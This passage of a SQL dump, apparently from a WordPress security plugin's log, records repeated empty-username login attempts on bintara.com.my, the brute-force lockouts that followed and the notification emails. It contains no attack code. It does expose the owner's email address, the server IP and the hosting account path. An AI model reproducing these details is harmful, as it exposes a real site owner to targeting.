empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:18:\"/blog/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"98\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:40:\"https://bintara.com.my/blog/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:18:\"/blog/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYYvRzDrcQxTmGrCWuaUIgAAAcs\";s:12:\"REDIRECT_URL\";s:18:\"/blog/wp-login.php\";s:11:\"REMOTE_ADDR\";s:12:\"198.12.149.7\";s:11:\"REMOTE_PORT\";s:5:\"44676\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:40:\"https://bintara.com.my/blog/wp-login.php\";s:10:\"SCRIPT_URL\";s:18:\"/blog/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYYvRzDrcQxTmGrCWuaUIgAAAcs\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569075015.7178\";s:12:\"REQUEST_TIME\";s:10:\"1569075015\";}}','notice','2019-09-21 14:10:17','2019-09-21 14:10:16',17849304,19341280,'https://bintara.com.my/blog/wp-login.php',1,0,'198.12.149.7'),(26151,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:5;s:4:\"user\";i:10;s:6:\"period\";i:5;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 22:10:16\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 14:10:16\";s:14:\"lockout_expire\";s:19:\"2019-09-26 02:10:16\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-25 18:10:16\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 14:10:17','2019-09-21 14:10:16',17934192,19341280,'https://bintara.com.my/blog/wp-login.php',1,0,'198.12.149.7'),(26152,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 14:10:17','2019-09-21 14:10:16',18141072,19341280,'https://bintara.com.my/blog/wp-login.php',1,0,'198.12.149.7'),(26153,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:18:\"/test/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"98\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:40:\"https://bintara.com.my/test/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:18:\"/test/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYYvTTDrcQxTmGrCWuaUIwAAAcY\";s:12:\"REDIRECT_URL\";s:18:\"/test/wp-login.php\";s:11:\"REMOTE_ADDR\";s:14:\"111.90.140.100\";s:11:\"REMOTE_PORT\";s:5:\"55590\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:40:\"https://bintara.com.my/test/wp-login.php\";s:10:\"SCRIPT_URL\";s:18:\"/test/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYYvTTDrcQxTmGrCWuaUIwAAAcY\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569075021.9632\";s:12:\"REQUEST_TIME\";s:10:\"1569075021\";}}','notice','2019-09-21 14:10:23','2019-09-21 14:10:22',17849304,19340328,'https://bintara.com.my/test/wp-login.php',1,0,'111.90.140.100'),(26154,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:5;s:4:\"user\";i:10;s:6:\"period\";i:5;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 22:10:22\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 14:10:22\";s:14:\"lockout_expire\";s:19:\"2019-09-26 02:10:22\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-25 18:10:22\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 14:10:23','2019-09-21 14:10:22',17934224,19340328,'https://bintara.com.my/test/wp-login.php',1,0,'111.90.140.100'),(26155,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 14:10:23','2019-09-21 14:10:22',18141088,19340328,'https://bintara.com.my/test/wp-login.php',1,0,'111.90.140.100'),(26156,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:16:\"/wp/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"96\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:38:\"https://bintara.com.my/wp/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:16:\"/wp/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYYvnbfBTP0kPOVnb8jxHgAAAEk\";s:12:\"REDIRECT_URL\";s:16:\"/wp/wp-login.php\";s:11:\"REMOTE_ADDR\";s:13:\"51.75.205.104\";s:11:\"REMOTE_PORT\";s:5:\"36084\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:38:\"https://bintara.com.my/wp/wp-login.php\";s:10:\"SCRIPT_URL\";s:16:\"/wp/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYYvnbfBTP0kPOVnb8jxHgAAAEk\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569075101.5134\";s:12:\"REQUEST_TIME\";s:10:\"1569075101\";}}','notice','2019-09-21 14:11:42','2019-09-21 14:11:41',17848208,19338688,'https://bintara.com.my/wp/wp-login.php',1,0,'51.75.205.104'),(26157,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:5;s:4:\"user\";i:10;s:6:\"period\";i:5;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 22:11:41\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 14:11:41\";s:14:\"lockout_expire\";s:19:\"2019-09-26 02:11:41\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-25 18:11:41\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 14:11:42','2019-09-21 14:11:41',17932824,19338688,'https://bintara.com.my/wp/wp-login.php',1,0,'51.75.205.104'),(26158,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 14:11:42','2019-09-21 14:11:41',18139304,19338688,'https://bintara.com.my/wp/wp-login.php',1,0,'51.75.205.104'),(26159,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:23:\"/wordpress/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"103\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:45:\"https://bintara.com.my/wordpress/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:23:\"/wordpress/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYYvpFiJ7D9Gn7wDPh8lVgAAANQ\";s:12:\"REDIRECT_URL\";s:23:\"/wordpress/wp-login.php\";s:11:\"REMOTE_ADDR\";s:14:\"104.248.27.238\";s:11:\"REMOTE_PORT\";s:5:\"36774\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:45:\"https://bintara.com.my/wordpress/wp-login.php\";s:10:\"SCRIPT_URL\";s:23:\"/wordpress/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYYvpFiJ7D9Gn7wDPh8lVgAAANQ\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1569075108.098\";s:12:\"REQUEST_TIME\";s:10:\"1569075108\";}}','notice','2019-09-21 14:11:49','2019-09-21 14:11:48',17852920,19344160,'https://bintara.com.my/wordpress/wp-login.php',1,0,'104.248.27.238'),(26160,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:5;s:4:\"user\";i:10;s:6:\"period\";i:5;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 22:11:48\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 14:11:48\";s:14:\"lockout_expire\";s:19:\"2019-09-26 02:11:48\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-25 18:11:48\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 14:11:49','2019-09-21 14:11:48',17937720,19344160,'https://bintara.com.my/wordpress/wp-login.php',1,0,'104.248.27.238'),(26161,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 14:11:49','2019-09-21 14:11:48',18144352,19344160,'https://bintara.com.my/wordpress/wp-login.php',1,0,'104.248.27.238'),(26162,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:18:\"/2019/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"92\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:40:\"https://bintara.com.my/2019/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:18:\"/2019/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYYvt7fBTP0kPOVnb8jxIwAAAFc\";s:12:\"REDIRECT_URL\";s:18:\"/2019/wp-login.php\";s:11:\"REMOTE_ADDR\";s:13:\"139.59.171.46\";s:11:\"REMOTE_PORT\";s:5:\"43295\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:40:\"https://bintara.com.my/2019/wp-login.php\";s:10:\"SCRIPT_URL\";s:18:\"/2019/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYYvt7fBTP0kPOVnb8jxIwAAAFc\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569075127.8829\";s:12:\"REQUEST_TIME\";s:10:\"1569075127\";}}','notice','2019-09-21 14:12:09','2019-09-21 14:12:08',17849640,19338184,'https://bintara.com.my/2019/wp-login.php',1,0,'139.59.171.46'),(26163,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:5;s:4:\"user\";i:10;s:6:\"period\";i:5;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 22:12:08\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 14:12:08\";s:14:\"lockout_expire\";s:19:\"2019-09-26 02:12:08\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-25 18:12:08\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 14:12:09','2019-09-21 14:12:08',17934368,19338184,'https://bintara.com.my/2019/wp-login.php',1,0,'139.59.171.46'),(26164,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 14:12:09','2019-09-21 14:12:08',18140920,19338184,'https://bintara.com.my/2019/wp-login.php',1,0,'139.59.171.46'),(26165,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:18:\"/blog/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"92\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:40:\"https://bintara.com.my/blog/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:18:\"/blog/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYYv17fBTP0kPOVnb8jxKQAAAE0\";s:12:\"REDIRECT_URL\";s:18:\"/blog/wp-login.php\";s:11:\"REMOTE_ADDR\";s:11:\"138.68.30.2\";s:11:\"REMOTE_PORT\";s:5:\"35762\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:40:\"https://bintara.com.my/blog/wp-login.php\";s:10:\"SCRIPT_URL\";s:18:\"/blog/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYYv17fBTP0kPOVnb8jxKQAAAE0\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569075159.1173\";s:12:\"REQUEST_TIME\";s:10:\"1569075159\";}}','notice','2019-09-21 14:12:40','2019-09-21 14:12:39',17849696,19339544,'https://bintara.com.my/blog/wp-login.php',1,0,'138.68.30.2'),(26166,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login 